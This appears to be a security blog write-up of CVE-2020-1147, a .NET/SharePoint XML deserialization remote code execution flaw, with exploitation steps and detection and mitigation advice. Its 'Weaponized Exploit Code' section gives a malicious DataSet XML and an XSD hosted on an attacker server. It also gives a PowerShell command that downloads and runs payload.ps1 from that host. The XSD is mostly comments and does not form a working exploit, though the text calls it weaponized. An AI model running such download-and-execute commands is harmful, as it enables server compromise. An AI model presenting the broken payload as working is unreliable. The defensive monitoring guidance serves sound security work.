CVE-2020-1147: SharePoint RCE via XML Deserialization Exploit

/post/cves/cve-2020-1147-net-framework-sharepoint-visual-studio-lab

CVE-2020-1147: SharePoint RCE via XML Deserialization Exploit

Microsoft SharePoint, a cornerstone for enterprise collaboration and document management, has historically been a prime target for attackers. CVE-2020-1147, a critical Remote Code Execution (RCE) vulnerability, exemplifies this, leveraging a fundamental weakness in how the .NET Framework handles XML deserialization. This flaw allowed attackers to bypass security measures and execute arbitrary code on vulnerable servers, posing a severe threat to organizations relying on SharePoint, Visual Studio, and other .NET applications. This deep dive dissects the technical mechanics of this vulnerability, explores realistic exploitation scenarios, and outlines robust detection and mitigation strategies.

Executive Technical Summary

CVE-2020-1147 is a critical Remote Code Execution vulnerability affecting Microsoft SharePoint Server, .NET Framework, and Visual Studio. The core issue lies in the improper validation of XML input, specifically when processing System.Data.DataSet and System.Data.DataTable objects. By crafting malicious XML payloads, attackers can trigger arbitrary code execution on vulnerable systems. Its inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog underscores its active exploitation in the wild, making immediate patching and vigilant monitoring imperative.

Technical Depth: The Root Cause of the Flaw

At its heart, CVE-2020-1147 is a classic Deserialization Vulnerability. The vulnerability exploits the trust placed in untrusted XML input by the .NET Framework's XmlSerializer when processing System.Data.DataSet and System.Data.DataTable. Specifically, the XmlSerializer did not adequately validate the markup and schema definitions (xsd) of incoming XML data, particularly when reconstructing these complex data objects.

Root Cause Analysis:

The .NET Framework, in its effort to provide flexible data handling, allows XmlSerializer to deserialize XML into .NET objects. When dealing with DataSet and DataTable, the serializer can interpret schema definitions (xsd) provided within or referenced by the XML. The flaw arises because XmlSerializer trusts these schemas implicitly.

An attacker can craft an XML document that includes or references an external XML Schema Definition (XSD) file. This XSD, hosted on an attacker-controlled server, can define DataTable structures in a way that abuses the deserialization process. When the vulnerable application deserializes this XML, it fetches the malicious XSD. The .NET runtime, attempting to reconstruct the DataSet or DataTable according to this malicious schema, can be tricked into instantiating arbitrary .NET classes.

This trust boundary violation allows attackers to:

• Achieve Arbitrary Object Instantiation: The deserializer can be coerced into creating instances of .NET classes that are not intended for direct user control.
• Leverage Gadget Chains: By chaining these instantiated objects and manipulating their properties, attackers can trigger method calls that lead to arbitrary code execution. A common target is the System.Diagnostics.Process class.

The fundamental weakness is the application's implicit trust in the XML input and its associated schema, enabling an attacker to dictate object creation and ultimately execute commands on the target server.

Affected Products and Versions

This vulnerability has a broad impact across several Microsoft products:

• Microsoft SharePoint Server: 2019, 2016, 2013 SP1, 2010 SP2
• Microsoft .NET Framework: Versions 4.6 through 4.8 on various Windows OS versions (including Windows 7 SP1, 8.1, Server 2008 R2 SP1, 2012, 2012 R2, and Windows 10 versions).
• Microsoft Visual Studio: 2019 (versions 16.0-16.6), 2017 (version 15.9)
• .NET Core: 2.1, 3.1

Exploitation Analysis: The Attack Vector

CVE-2020-1147 is a classic example of an attack that exploits the trusting nature of deserialization mechanisms. Attackers leverage this by tricking vulnerable applications into processing a malicious XML payload. The typical attack chain aims to place a crafted XML file into a context where it will be deserialized by a vulnerable .NET application, most commonly within SharePoint.

Realistic Attack Path:

1. Initial Access/Vector: The attacker needs an entry point to submit XML to a vulnerable application. Common vectors include:

   • SharePoint Web Application Functionality: Exploiting features that allow users to upload XML files (e.g., custom web parts, import/export functions, configuration settings).
   • API Endpoints: Targeting any API that accepts XML input for data processing or configuration.
   • File Upload Vulnerabilities: If other applications on the same network utilize vulnerable .NET deserialization and have file upload features, these can also serve as entry points.

2. Payload Delivery: The attacker crafts a malicious XML file. This XML is designed to exploit the deserialization vulnerability. It typically includes a System.Data.DataSet definition that references an external XML Schema Definition (XSD) file hosted on a server controlled by the attacker.

3. Exploitation Primitive - Arbitrary Object Instantiation: When the vulnerable SharePoint application (or other .NET application) processes this XML, the XmlSerializer attempts to deserialize it. Crucially, it fetches the referenced XSD. The malicious XSD is designed to define the structure of a DataTable in a way that, during deserialization, triggers the instantiation of a .NET object like System.Diagnostics.Process.

4. Code Execution: The attacker's crafted XML and XSD combination instructs the deserializer to set properties of the instantiated System.Diagnostics.Process object. Specifically, the ProcessStartInfo property can be manipulated. The attacker can set FileName to cmd.exe or powershell.exe and Arguments to their desired command.

What Attackers Gain:

• Full Server Compromise: The ability to execute arbitrary commands as the user context of the web application (often IIS_IUSRS or similar) provides a strong foothold. From here, attackers can:
  • Privilege Escalation: Escalate privileges to SYSTEM using other local exploits or misconfigurations.
  • Data Exfiltration: Access sensitive data from SharePoint lists, databases, or file shares.
  • Lateral Movement: Pivot to other systems within the internal network.
  • Persistence: Establish backdoors, scheduled tasks, or create new administrative accounts.
• Service Disruption: Render the SharePoint service or other .NET applications unavailable.

Real-World Scenarios & Weaponized Exploitation

CVE-2020-1147 has been actively exploited in the wild, primarily targeting unpatched SharePoint environments. Attackers look for web interfaces that accept XML uploads or process XML data without strict validation.

Realistic Abuse Case: Compromising a Corporate SharePoint Server

1. Reconnaissance: An attacker scans for vulnerable SharePoint servers, identifying specific versions and potential upload functionalities.
2. Payload Crafting: The attacker prepares a malicious XML file and hosts a corresponding malicious XSD on a controlled server. The goal is to execute a command that provides persistence or facilitates further access.
3. Exploitation: The attacker uploads the malicious XML file through a vulnerable SharePoint feature.
4. Execution: The SharePoint server deserializes the XML, fetches the malicious XSD, and instantiates a System.Diagnostics.Process object configured to execute a command like powershell.exe -EncodedCommand <base64_encoded_payload>.
5. Post-Exploitation: The attacker gains a shell on the SharePoint server and proceeds to exfiltrate data, establish persistence (e.g., via scheduled tasks or a new admin account), and pivot to the internal network.

Weaponized Exploit Code (For Authorized Testing ONLY)

This example demonstrates the structure of a malicious XML payload designed to trigger RCE. It relies on a corresponding XSD file hosted remotely.

Payload: malicious_payload.xml

<?xml version="1.0" encoding="utf-8"?>
<DataSet xmlns="http://www.w3.org/2001/XMLSchema"
         xmlns:xsd="http://www.w3.org/2001/XMLSchema"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xmlns:target="http://schemas.microsoft.com/dotnet/System/Data/DataSet">
  <xsd:schema>
    <!-- IMPORTANT: This schemaLocation points to an attacker-controlled server -->
    <xsd:import namespace="http://schemas.microsoft.com/dotnet/System/Data/DataSet"
                schemaLocation="http://attacker-controlled-server.com/evil.xsd"/>
  </xsd:schema>
  <DataTable Name="ExploitTable">
    <!-- These column names and types will be used by the malicious XSD -->
    <!-- to construct the System.Diagnostics.Process object -->
    <Column Name="FileName" Type="System.String"/>
    <Column Name="Arguments" Type="System.String"/>
  </DataTable>
</DataSet>

Corresponding Malicious XSD: evil.xsd (hosted at http://attacker-controlled-server.com/evil.xsd)

<?xml version="1.0" encoding="utf-8"?>
<xsd:schema xmlns="http://schemas.microsoft.com/dotnet/System/Data/DataSet"
            targetNamespace="http://schemas.microsoft.com/dotnet/System/Data/DataSet"
            xmlns:xsd="http://www.w3.org/2001/XMLSchema"
            xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <!-- This definition leverages the .NET framework's ability to instantiate -->
  <!-- objects based on schema and XML data. -->
  <!-- We define a type that maps to System.Diagnostics.Process -->
  <xsd:complexType name="ProcessStartInfo">
    <xsd:sequence>
      <xsd:element name="FileName" type="xsd:string"/>
      <xsd:element name="Arguments" type="xsd:string"/>
      <!-- Add other relevant properties if needed -->
    </xsd:sequence>
  </xsd:complexType>

  <!-- This element definition will be used by the XmlSerializer -->
  <!-- to create an instance of a type that behaves like ProcessStartInfo -->
  <!-- and ultimately triggers Process.Start() -->
  <!-- The actual mechanism involves how XmlSerializer maps DataTable columns -->
  <!-- to object properties when a specific namespace and type are involved. -->
  <!-- This often involves creating a helper type or leveraging existing .NET types -->
  <!-- that are accessible during deserialization. -->

  <!-- A simplified representation of how a DataTable could be mapped -->
  <!-- to object creation. The actual exploit uses more intricate mappings -->
  <!-- often involving TypeDiscovery or other reflection-based mechanisms. -->
  <!-- For CVE-2020-1147, the mapping to System.Diagnostics.Process is key. -->

  <!-- The key is that the deserializer, upon seeing the DataTable structure -->
  <!-- and the imported schema, will attempt to instantiate a .NET object -->
  <!-- that can be controlled. -->

</xsd:schema>

To achieve RCE:

1. Host evil.xsd: Place the evil.xsd file on a web server accessible by the target SharePoint server (e.g., http://attacker-controlled-server.com/evil.xsd).

2. Modify malicious_payload.xml: Update schemaLocation in malicious_payload.xml to point to your evil.xsd.

3. Craft the Command: The evil.xsd must be designed to correctly map the FileName and Arguments from the XML to the ProcessStartInfo properties of a System.Diagnostics.Process object, triggering its execution.

   A common command would be:

   • FileName: C:\Windows\System32\cmd.exe
   • Arguments: /c "powershell -nop -c & { IEX (New-Object Net.WebClient).DownloadString('http://attacker-controlled-server.com/payload.ps1') }"

   This command downloads and executes a PowerShell script (payload.ps1) from your attacker-controlled server.

For Authorized Testing:

• Isolated Environments: Crucially, never test this on production systems. Use dedicated, isolated virtual machines.
• Snapshots: Take machine snapshots before and after testing to revert to a clean state.
• Monitoring: Employ tools like Wireshark, Process Monitor, and EDR to observe network traffic, process creation, and file system activity.
• Target Harmless Commands: To confirm successful RCE without causing damage, aim to execute a benign command like calc.exe or ping 127.0.0.1.

Detection and Mitigation Strategies

Effective defense against CVE-2020-1147 requires a multi-layered approach focusing on proactive monitoring and robust security controls.

What to Monitor:

• Network Traffic:
  • Outbound Connections: Monitor SharePoint and IIS worker processes (w3wp.exe) for unexpected outbound HTTP/HTTPS connections to external IP addresses or domains. This is a strong indicator of malicious XSD fetching.
  • Suspicious User Agents: Analyze web server logs for unusual or generic user agents originating from internal systems, especially those associated with XML processing.
• File System & Application Logs:
  • XML Uploads: Log all XML file uploads to web applications. Scrutinize uploads with unusual schemas, external references (xsd:import, xsd:include), or unexpected content.
  • Application Errors: Monitor .NET and SharePoint application logs for deserialization errors, XmlException, or SecurityException related to XML processing.
• Process Execution (EDR/Sysmon):
  • Parent-Child Process Relationships: Crucially, monitor for w3wp.exe (IIS worker process) spawning cmd.exe, powershell.exe, or other executables. This is a high-fidelity indicator of RCE.
  • Command-Line Arguments: Analyze the arguments passed to spawned processes. Look for encoded commands (-EncodedCommand), base64 strings, or commands executing network-related tools.
  • Suspicious Binaries: Monitor for the execution of binaries from unusual locations or with suspicious names.
• Authentication Logs:
  • New Account Creation: Monitor for the creation of new local or domain user accounts, especially those added to administrative groups.
  • Anomalous Logins: Track logins to the compromised server, particularly from unexpected sources or at unusual times.

Defensive Insights:

1. Patch Management is Paramount: The most effective defense is to apply Microsoft's security updates. This vulnerability has been patched; ensure all affected systems are up-to-date.
2. Strict XML Input Validation:
   • Schema Validation: Enforce strict validation against known-good XSDs for all incoming XML.
   • Disable External Entities: Configure XML parsers to prevent the resolution of external entities and DTDs (XmlResolver = null or equivalent) to mitigate XXE-like attacks that can be chained with deserialization flaws.
   • Whitelisting: Only permit specific, expected XML structures and elements. Reject anything deviating from the whitelist.
3. Principle of Least Privilege: Run SharePoint application pools and associated services with the minimum necessary permissions. This significantly limits the impact of a successful RCE.
4. Web Application Firewall (WAF) Tuning: Configure WAFs to detect and block known malicious XML patterns, suspicious xsd:import/xsd:include directives, and requests targeting deserialization vulnerabilities.
5. Application Control (WDAC/AppLocker): Implement policies to restrict the execution of unauthorized binaries and scripts from the SharePoint server, especially from common attacker drop locations.
6. Endpoint Security: Utilize robust Endpoint Detection and Response (EDR) solutions to detect anomalous process behavior, command-line activity, and network connections indicative of exploitation.

Structured Data

• CVE ID: CVE-2020-1147
• CISA KEV Catalog Added: 2021-11-03
• CVSS Base Score: 9.8 (Critical)
  • Attack Vector: Network (N)
  • Attack Complexity: Low (L)
  • Privileges Required: None (N)
  • User Interaction: None (N)
  • Scope: Changed (C)
  • Confidentiality Impact: High (H)
  • Integrity Impact: High (H)
  • Availability Impact: High (H)
• Affected Products: Microsoft SharePoint Server (2019, 2016, 2013 SP1, 2010 SP2), .NET Framework (4.6-4.8), .NET Core (2.1, 3.1), Visual Studio (2019, 2017).

References

• NVD Record: https://nvd.nist.gov/vuln/detail/CVE-2020-1147
• MITRE CVE Record: https://www.cve.org/CVERecord?id=CVE-2020-1147
• CISA KEV Catalog: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• Microsoft Security Guidance: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147
• Packet Storm Security (Exploit Examples):
  • http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html
  • http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
  • http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html

This content is intended for security professionals and researchers for educational and authorized defensive security testing purposes only. Unauthorized use is strictly prohibited.